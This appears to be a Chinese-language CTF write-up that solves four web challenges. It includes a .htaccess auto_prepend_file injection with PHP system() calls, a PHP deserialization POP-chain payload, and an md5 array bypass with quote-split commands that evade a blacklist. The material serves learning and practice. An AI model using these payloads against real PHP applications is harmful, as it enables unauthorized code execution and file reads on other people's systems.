2024信安杯复现

Can_can_need

打开是一个网页,没什么发现,直接先爆破目录

找到疑似存放源码的文件

检测到病毒不让我下载😂,linux里去下

在源码的js目录下存在一句话木马

读取到flag

Ez_htaccess

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

代码中先删除当前目录除了index.php的所有文件,然后让我们指定文件写入,再删除除了index.php的所有文件

根据题目提示,需要上传.htaccess文件,了解到可以在.htaccess中写入php_value auto_prepend_file xxxx 让phph在执行前自动引入xxxx(被当作php执行)

写入内容如下:

1
2
3

php_value auto_prepend_file .htaccess
#<?php system('cat /flag');?>

但由于file跟flag被过滤,所以修改为

1
2
3
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /f*');?>

涉及到换行,先用url编码后发送

得到flag

Ez_serial

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "how to bypass?";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "prepare to hack";
        return $functioin();
    }
}
class hacking{
    public $weapon;
    public function __invoke(){
        echo "win!";
        include($this->weapon);
    }
}
class summon{
    public $Hacker;
    public $Rider;

    public function __wakeup(){
        echo "start hacking";
        echo $this->Hacker;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>

构造思路如下:cummon会在被反序列化时被调用,echo会触发__toString方法,excalibuer->arrow执行时,如果excalibuer下没有arrow属性,又会触发__get方法,而__get下又会触发$function函数,__invoke()方法当对象被当成函数调用时会触发,从而include一个文件,所以序列化代码如下:

1
2
3
4
5
6
7
$payload = new summon();
$payload->Hacker = new artifact();
$payload->Hacker->excalibuer = new prepare();
$payload->Hacker->excalibuer->release = new hacking();
$payload->Hacker->excalibuer->release->weapon = "/flag";

echo  serialize($payload);

得到:

1
O:6:"summon":2:{s:6:"Hacker";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:7:"hacking":1:{s:6:"weapon";s:5:"/flag";}}s:5:"arrow";N;}s:5:"Rider";N;}

得到flag

哎~想她了

源码中提示有个php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
//flag in /flag

highlight_file(__FILE__);
error_reporting(0);
$a = $_GET['fj1'];
$b = $_GET['fj2'];
if($a!==$b&&md5($a)===md5($b)){
    if(isset($_GET['cmd'])){
        $cmd = $_GET['cmd'];
        if(!preg_match("/\;|cat|flag|[0-9]|\\$|\*|more|system|exec|tac/i", $cmd)){
            system($cmd);
        }
        else{
            die("哎~就差一点儿~我就可以拉到她的手~");
        }
    }
}
else{
    echo "哎~想她了~";
}
?> 哎~想她了~

强比较用数组绕过,没有过滤引号,关键词用引号绕过

1
fj1[]=1&fj2[]=2&cmd=ca''t /fl''ag

得到flag